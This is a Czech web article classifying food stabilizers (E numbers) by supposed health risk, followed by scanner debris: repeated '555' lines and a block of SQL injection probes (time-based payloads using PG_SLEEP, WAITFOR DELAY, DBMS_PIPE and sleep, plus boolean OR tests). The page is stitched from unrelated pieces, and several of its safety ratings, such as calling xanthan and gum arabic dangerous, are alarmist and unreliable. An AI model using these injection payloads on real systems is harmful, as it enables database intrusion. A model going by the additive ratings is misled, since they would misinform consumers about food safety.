Stabilizátory pomáhají udržovat v potravinách rovnoměrné rozptýlení různých látek, které se vzájemně nesmíchají. V potravinářském průmyslu se velmi často využívají stabilizátory, které jsou zároveň i želírující látky.
Stabilizátory pomáhají dlouhodobě udržovat fyzikální vlastnosti potravin, především jejich konzistenci a zbarvení. Potraviny se často skládají ze surovin, které se spolu přirozeně nemísí a časem by se bez použití stabilizátorů od sebe oddělily - například kakao by se v kakaovém mléku usadilo na dně. Stabilizátory ale také zajišťují stálost barvy potravin. Nejčastěji používané stabilizátory jsou modifikované škroby a rostlinné gumy, a stabilizační schopnosti mají i některé želírující látky, například želatina nebo pektiny.
Používání různých stabilizátorů je velmi rozšířené a jsou snad ve všech skupinách potravin. Obsahují je zmrzliny, emulgované tuky, emulzní likéry, studené omáčky, deserty a mnoho dalších potravin.
Stabilizátory jsou v několika různých skupinách tzv. E látek. Dělí se na
- přírodní a přírodně identické
- polosyntetické a syntetické
Stabilizátory, které pocházejí z přírodních zdrojů, jsou zcela bezpečné a nemají žádné negativní účinky na lidské zdraví
- E 406 - Agar
- E 417 - Guma tara
- E 418 - Guma gellan
- E 425 - Konjaková guma
- E 336 - Vinany draselné
Přírodní stabilizátory, které mohou způsobit alergické reakce
- E 407a - Guma Euchema
- E 412 - Guma guar
Uměle získané stabilizátory přírodního a živočišného původu a přírodně identické látky
- bez prokázaných nepříznivých vedlejších účinků na zdraví
- E 432 - Polyoxyethylensorbitanmonolaurát
- E 434 - Polyoxyethylensorbitanmonopalmitát
- E 435 - Polyoxyethylensorbitanmonostearát
- E 436 - Polyoxyethylensorbitantristearát
- E 440 - Pektiny
- E 441 - Želatina
- E 442 - Fosfatidy amonné
- E 470 - Sodné, draselné a vápenaté soli mastných kyselin, hořečnaté soli mastných kyselin
- E 471 - Mono- a diglyceridy mastných kyselin
- E 472 - Estery mastných kyselin a, b, c, d, e, f
- E 473 - Estery sacharózy s mastnými kyselinami
- E 475 - Estery polyglycerolu s mastnými kyselinami
- E 477 - Estery propylenglykolu s mastnými kyselinami
- E 481 - Stearoylaktylát sodný
- E 492 - Tristearát sorbitolu
- E 493 - Monolaurát sorbitolu
- E 494 - Monooleát sorbitolu
- E 495 - Monopalmitát sorbitolu
- E 572 - Stearan hořečnatý
- způsobující alergické reakce a hyperaktivitu
- E 433 - Polyoxyethylensorbitanmonooleát
- E 491 - Monostearát sorbitolu
Uměle získané stabilizátory přírodního a živočišného původu a syntetické stabilizátory bez vedlejších účinků na zdraví
- zcela bezpečné
- E 170 - Uhličitany vápenaté
- E 263 - Octan vápenatý
- E 315 - Kyselina erythorbová
- E 316 - Erythorban sodný
- E 331 - Citronany sodné
- E 332 - Citronany draselné
- E 335 - Vinany sodné
- E 337 - Vinan sodnodraselný
- E 410 - Karubin
- E 460 - Celulózy
- E 579 - Glukonan železnatý
- bez prokázaných negativních účinků
- E 339 - Fosforečnany sodné
- E 340 - Fosforečnany draselné
- E 340(i) - Dihydrogenfosforečnan draselný
- E 340(ii) - Monohydrogenfosforečnan draselný
- E 340(iii) - Fosforečnan draselný
- E 341 - Fosforečnany vápenaté
- E 343 - Fosforečnany hořečnaté
- E 353 - Kyselina metavinná
- E 380 - Citronan triamonný
- E 383 - Glycerofosforečnan vápenatý
- E 444 - Acetát isobutyrát sacharózy
- E 461 - Methylcelulóza
- E 463 - Hydroxypropylcelulóza
- E 464 - Hydroxypropylmethylcelulóza
- E 465 - Ethylmethylcelulóz
- E 466 - Karboxymethylcelulóza
- E 468 - Kroskaramelóza
- E 469 - Enzymově hydrolyzovaná karboxymethylcelulóza
- E 482 - Stearoyllaktylát vápenatý
- E 504 - Uhličitany hořečnaté
- E 528 - Hydroxid hořečnatý
- E 953 – Isomalt
- E 967 - Xylitol
- E 968 - Erythritol
- E 1200 - Polydextrosy
- E 1401 - Škrob pozměněný působením kyseliny
- E 1402 - Škrob pozměněný působením zásady
- E 1403 - Bělené škroby
- E 1404 - Oxidovaný škrob
- E 1405 - Škrob pozměněný působením enzymů
- E 1410 - Fosfát škrobu
- E 1412 - Zesíťovaný fosfát škrobu
- E 1413 - Fosfát zesíťovaného fosfátu
- E 1414 - Acetát zasíťovaného fosfátu škrobu
- E 1420 - Acetát škrobu
- E 1422 - Acetát zesíťovaného adipátu škrobu
- E 1440 - Hydroxypropylether škrobu
- E 1442 - Hydroxypropylether zesíťovaného fosfátu škrobu
- E 1450 - Sodná sůl oktenylsukcinátu škrobu
- E 1451 - Acetylovaný oxidovaný škrob
Pro lidský organismus nevhodné stabilizátory
- s podezřením na možné alergické reakce
- E 508 - Chlorid draselný
- E 626 - Kyselina guanylová
- E 1519 - Benzylalkohol
- způsobující alergické reakce, hyperaktivita, nevhodné pro děti!
- E 280 - Kyselina propionová
- E 281 - Propionan sodný
- E 320 - Butylhydroxyanisol (BHA)
- E 321 - Butylhydroxytoluen (BHT)
- E 325 - Mléčnan sodný
- E 326 - Mléčnan draselný
- E 327 - Mléčnan vápenatý
- E 627 - Guanylan sodný
- E 628 - Guanylan draselný
- E 629 - Guanylan vápenatý
Na zdraví člověka nepříznivě působící stabilizátory s možnou alergickou reakcí
- E 450 - Difosforečnany
- E 452 - Polyfosforečnany ( sodný, draselný a vápenatý )
- E 459 - Beta - cyklodextrin
- E 512 - Chlorid cínatý
- E 965 - Maltitol
Stabilizátory s výrazně škodlivými účinky, které jsou považované za nebezpečné. Způsobují alergické reakce a hyperaktivitu, jsou zcela nevhodné pro děti!
- E 249 - Dusitan draselný
- E 250 - Dusitan sodný
- E 251 - Dusičnan sodný
- E 252 - Dusičnan draselný
- E 321 - Butylhydroxytoluen (BHT)
- E 400 - Kyselina alginová
- E 401 - Alginát sodný
- E 402 - Alginát draselný
- E 403 - Alginát amonný
- E 404 - Alginát vápenatý
- E 405 - Propylenglykolalginát
- E 407 - Karagenan
- E 413 - Tragant
- E 414 - Arabská guma
- E 415 - Xanthan
- E 416 - Guma karaya
- E 420 - Sorbitol
- E 421 - Mannitol
- E 445 - Pryskyřičný ester
- E 585 - Mléčnan železnatý
- E 1201 - Polyvinylpyrrolidon (PVP, Povidon)
- E 1202 - Polyvinylpolypyrrolidon (Síťovaný povidon, PVPP)
- E 1520 - Propylenglykol
Zakázané stabilizátory
- E 409 - Arabinnogalaktan
- E 419 - Guma ghatti
- E 430 - Polyoxyethylen stearát
- E 443 - Bromovaný rostlinný olej
- E 467 - Ethylhydroxyethylcelulóza
- E 478 - Laktylované estery glycerolu a propandiolu
- E 539 - Thiosíran sodný
- E 1411 - Diškrobový glycerol
I když jsou tyto stabilizátory v ČR a EU zakázané, nelze vyloučit, že je nebudou obsahovat potraviny vyrobené mimo země Evropské unie, které byly do ČR a EU dovezené.
Stabilizátory se v mnoha případech kombinují, protože mnohé z nich mají i jiné vlastnosti a působí například jako želírovací prostředky. Převážná většina stabilizátorů není lidské zdraví nijak zásadně neohrožuje. I tak je ale stále poměrně velké množství těchto látek, které na lidský organismus působí negativně, a nebo dokonce mají i škodlivé účinky. Množství, které lze do potravin přidat je samozřejmě určené přísnými předpisy a při konzumaci běžného množství by se projevit nemělo. Spotřebitel by měl vždy z údajů na obalu zkontrolovat, jaké stabilizátory potravina obsahuje a v případě, že v ní jsou látky pro zdraví nevhodné, omezit jejich konzumaci na minimum nebo úplně.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@fwNWj
1%2527%2522
1'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
YkCYpFQP')) OR 84=(SELECT 84 FROM PG_SLEEP(15))--
TK2YykXr') OR 695=(SELECT 695 FROM PG_SLEEP(15))--
IaVV3zwe' OR 132=(SELECT 132 FROM PG_SLEEP(15))--
-1)) OR 576=(SELECT 576 FROM PG_SLEEP(15))--
-5) OR 962=(SELECT 962 FROM PG_SLEEP(15))--
-5 OR 752=(SELECT 752 FROM PG_SLEEP(15))--
UlX6Cx8r'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+708-708) --
-1" OR 3*2<(0+5+708-708) --
-1" OR 3+708-708-1=0+0+0+1 --
-1" OR 2+708-708-1=0+0+0+1 --
-1' OR 3*2>(0+5+521-521) or 'IyTACFeY'='
-1' OR 3*2<(0+5+521-521) or 'IyTACFeY'='
-1' OR 3+521-521-1=0+0+0+1 or 'IyTACFeY'='
-1' OR 2+521-521-1=0+0+0+1 or 'IyTACFeY'='
-1' OR 3*2>(0+5+591-591) --
-1' OR 3*2<(0+5+591-591) --
-1' OR 3+591-591-1=0+0+0+1 --
-1' OR 2+591-591-1=0+0+0+1 --
-1 OR 3*2>(0+5+96-96)
-1 OR 3*2<(0+5+96-96)
-1 OR 3+96-96-1=0+0+0+1
-1 OR 2+96-96-1=0+0+0+1
-1 OR 3*2>(0+5+624-624) --
-1 OR 3*2<(0+5+624-624) --
-1 OR 3+624-624-1=0+0+0+1 --
-1 OR 2+624-624-1=0+0+0+1 --
555
555
555
555
555